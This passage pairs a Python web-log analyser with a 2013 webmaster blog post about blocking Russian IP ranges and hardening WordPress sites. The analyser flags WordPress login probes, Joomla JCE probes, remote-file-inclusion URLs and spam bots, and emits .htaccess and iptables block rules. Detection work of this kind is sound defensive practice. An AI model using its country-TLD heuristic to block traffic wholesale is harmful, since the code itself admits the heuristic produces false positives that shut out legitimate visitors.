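198.51.100.77 - - [07/Apr/2013:12:00:00 -0600] "GET /blogs/2013/04/article.html HTTP/1.1" 200 8765 "http://dating.example.ru/" "Mozilla/5.0 (Windows NT 6.1) MRA 5.10"
203.0.113.5 - - [07/Apr/2013:12:01:00 -0600] "GET /blogs/2013/04/article.html HTTP/1.1" 200 8765 "http://www.google.com/search?q=scxn" "Mozilla/5.0 (Windows NT 6.1)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

SPAM_REFERER_TLDS = {"ru", "ua", "su", "in"}   # the TLDs the post lists

def decode_path(path, encoding="cp1251"):
    """Percent-decode a request path. The forum-spam bot writes its report
    in Windows-1251 Cyrillic, so %F4%EE%F0%F3%EC becomes 'форум'."""
    return unquote_plus(path, encoding=encoding, errors="replace")

def referer_tld(referer):
    host = urlparse(referer or "").hostname or ""
    return host.rsplit(".", 1)[-1].lower() if "." in host else ""

def classify(rec):
    """Tag one parsed request with every attack pattern it matches."""
    path = rec["path"]
    tags = set()
    if path.startswith(("/wp-login.php", "/wp-admin")):
        tags.add("wordpress-login")
    if "option=com_jce" in path and "imgmanager" in path:
        tags.add("joomla-jce-probe")
    if re.search(r"[?&][^=&]+=https?://", path, re.I):   # parameter value is a URL: remote file inclusion
        tags.add("remote-file-include")
    if "Result:" in decode_path(path):                    # forum-spam bot reporting its own outcome
        tags.add("forum-spam-bot")
    # Referer TLD / 'MRA' agent is the post's own heuristic; expect some false positives.
    if referer_tld(rec.get("referer")) in SPAM_REFERER_TLDS or "MRA" in (rec.get("agent") or ""):
        tags.add("referrer-spam")
    return tags

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyze_log(text):
    """Return {ip: {"hits": n, "tags": set}} for every IP that tripped a rule."""
    report = defaultdict(lambda: {"hits": 0, "tags": set()})
    for line in text.splitlines():
        rec = parse_line(line.strip())
        if not rec:
            continue
        tags = classify(rec)
        if tags:
            report[rec["ip"]]["hits"] += 1
            report[rec["ip"]]["tags"] |= tags
    return dict(report)

def blocklist_directives(report, min_hits=1):
    """Single-host block rules in the two formats the post's Russian Blocklist
    ships: Apache 2.2 .htaccess 'Deny from' lines (shared hosting) and
    iptables DROP rules (root on a VPS). Widening a host to its owning CIDR,
    as the blocklist does, is a policy call left to the operator."""
    ips = sorted(ip for ip, r in report.items() if r["hits"] >= min_hits)
    htaccess = ["Order Allow,Deny", "Allow from all"] + ["Deny from %s" % ip for ip in ips]
    iptables = ["iptables -A INPUT -s %s -j DROP" % ip for ip in ips]
    return {"htaccess": htaccess, "iptables": iptables}
```

The .htaccess lines use the Apache 2.2 Order/Allow/Deny syntax that shared hosts ran in 2013; on Apache 2.4 the equivalent is a "Require not ip" block. Raise min_hits before blocking automatically, or a single 404 from a misconfigured crawler will lock it out for good.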

Most of these IP addresses are already encompassed by my regularly updated Russian Blocklist, which is available online in two formats: .htaccess (for shared hosting accounts on Apache/Linux servers) and iptables (for dedicated and VPS Apache/Linux hosting where you have root access). I do not currently publish a version that is compatible with Microsoft IIS servers, but I am pondering a possible conversion. Anybody whose website is hosted on an Apache web server should be able to use the .htaccess directives in the Russian Blocklist, by copying and pasting them into an existing .htaccess file, or by creating a new one from the blocklist example (read the instructions in the file).

If you deploy any website software that runs on PHP, expect its vulnerabilities to be sought and found by hackers. Subscribe to the update notification mailing lists of every maintainer whose web software you or your predecessors have installed on your websites. Patching vulnerable web software quickly is vital if you want to keep your website from serving the malicious scripts and hidden iframes that lead to your visitors' computers being infected with malware, ransomware or search hijackers.

Additionally, since many of the probes I log are trying to log in to a WordPress installation, use a strong, unguessable password and do not keep the "admin" user name that a default installation gives you. Further, rename any folders that a default installation names "admin". Hackers send bots searching for such folders and login pages, try the default user name with common passwords, and then add malicious scripts to your web pages.

About the author
Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is computer and website security. Wizcrafts Computer Services was established in 1996.

Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.
Powered by Movable Type
